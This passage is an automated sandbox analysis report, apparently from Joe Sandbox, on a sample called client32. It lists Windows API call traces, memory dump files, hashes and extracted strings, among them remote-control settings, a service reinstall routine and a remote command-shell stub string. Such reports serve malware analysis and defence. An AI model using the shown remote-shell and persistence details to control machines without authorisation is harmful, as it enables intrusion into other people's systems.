                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                                                                                                      • Part of subcall function 110EAED0: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAEEC
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000043), ref: 110276A4
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110276CB
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110276F5
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027785
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102779C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110277A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcesswsprintf$AddressCurrentMetricsNameProcSystemVersion
                                                                                                                                                                                                    • String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
                                                                                                                                                                                                    • API String ID: 3843341194-531500863
                                                                                                                                                                                                    • Opcode ID: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction ID: d2b55fc42617096dc1e54143e0f6b596911c59ff24b6e1298e75f3af09eb386e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41FA74E4062AAAEB50DBA0CC85FEDF7B8AB14708F1041D5E929B72C0EB70B544CB54
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 689C59B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                    • String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
                                                                                                                                                                                                    • API String ID: 1659193697-3520600413
                                                                                                                                                                                                    • Opcode ID: b59d6027687ca4a8ecdc319d407504c2855ee51ec30457b67e0a42384d323df9
                                                                                                                                                                                                    • Instruction ID: aac51dd48ee64db2422d787cd1183d78277d01f4d8be0deac49c3ab65f8c2f48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b59d6027687ca4a8ecdc319d407504c2855ee51ec30457b67e0a42384d323df9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57A174B5940218BFDB15DBA4CC98FAFB37CAF95308F8045D9E50966140EB71EA848F63
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111211B5
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
                                                                                                                                                                                                    • String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
                                                                                                                                                                                                    • API String ID: 3042533059-2538903574
                                                                                                                                                                                                    • Opcode ID: afd89c2d0da7b64e68538ed8bc1b9139911b90978eaacfc1fa793ef2651d198e
                                                                                                                                                                                                    • Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
                                                                                                                                                                                                    • Opcode Fuzzy Hash: afd89c2d0da7b64e68538ed8bc1b9139911b90978eaacfc1fa793ef2651d198e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • ShowCursor.USER32(00000000), ref: 110F55DD
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,NSBlankExit), ref: 110F55EE
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5614
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5633
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F5644
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F564D
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5661
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110F5674
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F568C
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F56A7
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F56B0
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F56BF
                                                                                                                                                                                                    • ShowCursor.USER32(00000001), ref: 110F56CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$CursorDispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpenwsprintf
                                                                                                                                                                                                    • String ID: NSBlankExit
                                                                                                                                                                                                    • API String ID: 861170112-773372720
                                                                                                                                                                                                    • Opcode ID: 428f5509f064d4734e405ac20bae2f2cf8d1d49ef49b58fe29b078e18522384e
                                                                                                                                                                                                    • Instruction ID: 5ec7c1be67ca2a78862dc13c18a8ec745b66933f059b542a1e0c74ee0f1129a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428f5509f064d4734e405ac20bae2f2cf8d1d49ef49b58fe29b078e18522384e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68513E76E4132EABDB10DF608C85FEDB7B8AB48704F1005A9E615D7184EB75AA40CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111031DA
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$Leave$Enter$Initializewsprintf
                                                                                                                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                                                                                                    • API String ID: 3438809195-3013461081
                                                                                                                                                                                                    • Opcode ID: f437808cb68b0cdf9c9a090f041c5d652d6d3a7b5d776a714f30d524b2f354e2
                                                                                                                                                                                                    • Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f437808cb68b0cdf9c9a090f041c5d652d6d3a7b5d776a714f30d524b2f354e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,?), ref: 11157805
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 11157817
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 11157821
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,-00000001,00000001,?), ref: 11157858
                                                                                                                                                                                                    • DeleteMenu.USER32(?,-00000001,00000400,?,?), ref: 11157871
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 11157878
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1115790B
                                                                                                                                                                                                    • IsWindowVisible.USER32(7658FC40), ref: 11157921
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$Item$Count$DeleteInfoVisibleWindowwsprintf
                                                                                                                                                                                                    • String ID: &%d %s$0$0$C
                                                                                                                                                                                                    • API String ID: 842373234-1709426716
                                                                                                                                                                                                    • Opcode ID: 77f97b495f7733a266680904539a4bd5a8708f4ad21c4815dcaf4031efbd88c4
                                                                                                                                                                                                    • Instruction ID: 1e8589750d2a290717ebac9bef8f5a9acc43d2f8c320684ce06ac1595057c3e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77f97b495f7733a266680904539a4bd5a8708f4ad21c4815dcaf4031efbd88c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551D4719006299BDB91CF64CC85BEEF7B8EF45318F4080D9E919A7240EB71AA81CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75C22EF0,75C22EE0,75C32D70), ref: 11059504
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059516
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059520
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 1105952C
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059536
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059542
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1105954C
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059558
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000000), ref: 11059560
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1105958D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11059639
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCA2
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCD4
                                                                                                                                                                                                      • Part of subcall function 1108BC20: CloseHandle.KERNEL32(00000000), ref: 1108BD0C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$EventInformation$Create$Close$ResetTokenVersionwsprintf
                                                                                                                                                                                                    • String ID: CloseHandle_1$D$remcmdstub.exe %u %u %u %u %%COMSPEC%%
                                                                                                                                                                                                    • API String ID: 2554110944-1870880251
                                                                                                                                                                                                    • Opcode ID: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
                                                                                                                                                                                                    • Instruction ID: 9498dede17ae523b820893f7966d078463fb7189cb60d919b27b44eccd4d473b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8516675A41328ABEB51CF98CC85FEAB7B9EB48B04F004099F718E72C4E6B16940CF55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1103B15F
                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 1103B1A4
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000010,00000000,00000000), ref: 1103B1CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
